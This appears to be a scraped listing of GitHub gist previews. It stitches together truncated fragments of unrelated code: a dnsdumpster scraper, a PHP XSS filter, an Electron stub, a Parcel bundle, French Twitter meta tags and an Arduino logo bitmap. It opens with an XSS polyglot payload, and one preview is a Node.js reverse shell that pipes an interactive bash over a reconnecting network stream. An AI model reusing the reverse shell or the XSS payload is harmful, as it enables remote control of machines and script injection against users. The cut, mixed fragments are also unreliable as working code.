<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var request = require("request"); | |
var tough = require('tough-cookie'); | |
var needle = require("needle"); | |
var Cookie = tough.Cookie; | |
request.get('https://dnsdumpster.com/', (error, response, body) => { | |
var cookie = Cookie.parse(response.headers['set-cookie'][0]); | |
returnCookie = cookie.cookieString(); | |
var finalCookie = returnCookie.split('='); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import os.path | |
if __name__ == "__main__": | |
if len(sys.argv) != 2: | |
print("usage: {} names.txt".format((sys.argv[0]))) | |
sys.exit(0) | |
if not os.path.exists(sys.argv[1]): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<php? | |
function xss_clean($data) | |
{ | |
// Fix &entity\n; | |
$data = str_replace(array('&','<','>'), array('&amp;','&lt;','&gt;'), $data); | |
$data = preg_replace('/(&#*\w+)[\x00-\x20]+;/u', '$1;', $data); | |
$data = preg_replace('/(&#x*[0-9A-F]+);*/iu', '$1;', $data); | |
$data = html_entity_decode($data, ENT_COMPAT, 'UTF-8'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const {app, BrowserWindow} = require('electron') | |
const path = require('path') | |
let mainWindow | |
function sleep(ms) { | |
return new Promise(resolve => setTimeout(resolve, ms)); | |
} | |
app.on('ready', () => { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var spawn = require('child_process').spawn; | |
var net = require('net'); | |
var reconnect = require('reconnect'); | |
reconnect(function (stream) { | |
var ps = spawn('bash', [ '-i' ]); | |
stream.pipe(ps.stdin); | |
ps.stdout.pipe(stream, { end: false }); | |
ps.stderr.pipe(stream, { end: false }); | |
ps.on('exit', function () { stream.end() }); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
parcelRequire = function(e, r, t, n) { | |
var i, o = "function" == typeof parcelRequire && parcelRequire, | |
u = "function" == typeof require && require; | |
function f(t, n) { | |
if (!r[t]) { | |
if (!e[t]) { | |
var i = "function" == typeof parcelRequire && parcelRequire; | |
if (!n && i) return i(t, !0); | |
if (o) return o(t, !0); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<head> | |
<meta name="twitter:card" content="summary_large_image" /> | |
<meta name="twitter:description" content="Site de diffusion de documents de plainte préremplis pour les personnes médicaux, citoyens, malades, proches de victimes" /> | |
<meta name="twitter:title" content="plaintecovid.fr - responsabilité de l'État français dans le drame en cours" /> | |
<meta name="twitter:site" content="PlainteCovid" /> | |
<meta name="twitter:image" content="https://plaintecovid.fr/plaintecovid.jpg" /> | |
<meta name="twitter:creator" content="@GaccioB" /> | |
</head> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define WiFi_Logo_width 60 | |
#define WiFi_Logo_height 36 | |
const uint8_t WiFi_Logo_bits[] PROGMEM = { | |
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, | |
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x9F, 0x1F, 0x00, 0x00, 0x00, | |
0x00, 0x00, 0xC0, 0xFF, 0x3F, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0xFF, | |
0x7F, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0xFF, 0x7F, 0x00, 0x00, 0x00, | |
0x00, 0x00, 0xE0, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFC, 0xFF, | |
0xFF, 0x07, 0x00, 0x00, 0x00, 0xC0, 0xFF, 0xFF, 0xFF, 0x3F, 0x00, 0x00, | |
0x00, 0xC0, 0xFF, 0xFF, 0xFF, 0x7F, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, |